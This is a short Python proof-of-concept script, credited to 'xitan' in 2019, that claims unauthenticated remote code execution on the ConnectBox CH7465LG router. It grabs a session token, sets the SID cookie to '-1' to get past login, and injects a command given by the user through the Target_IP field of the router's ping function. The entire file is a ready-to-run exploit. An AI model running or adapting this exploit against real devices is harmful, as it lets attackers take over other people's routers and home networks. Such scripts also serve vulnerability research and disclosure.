#!/usr/bin/env python3
"""
poc-rce.py: Unauthenticated Remote Code Execution for the ConnectBox (CH7465LG).
xitan - 2019 (https://xitan.me).
"""
import requests
import sys

if len(sys.argv) < 3:
    print("./poc-rce.py <router-ip> <command>")
    exit(1)

session = requests.Session()

index = session.get('http://' + sys.argv[1] + '/index.html', verify=False)

token = index.headers.get('Set-Cookie')[
        index.headers.get('Set-Cookie').find('=') + 1:index.headers.get('Set-Cookie').find(';')]
session.cookies['SID'] = '-1'

data = {
    'token': token,
    'fun': '126',
    'Type': '1',
    'Target_IP': 'google.com"\"; ' + sys.argv[2] + ';',
    'Ping_Size': '64',
    'Num_Ping': '5',
    'Ping_Interval': '1'
}

setter = session.post('http://' + sys.argv[1] + '/xml/setter.xml', data=data, verify=False)

if setter.status_code == 200:
    print('[+] Command successfully sent.')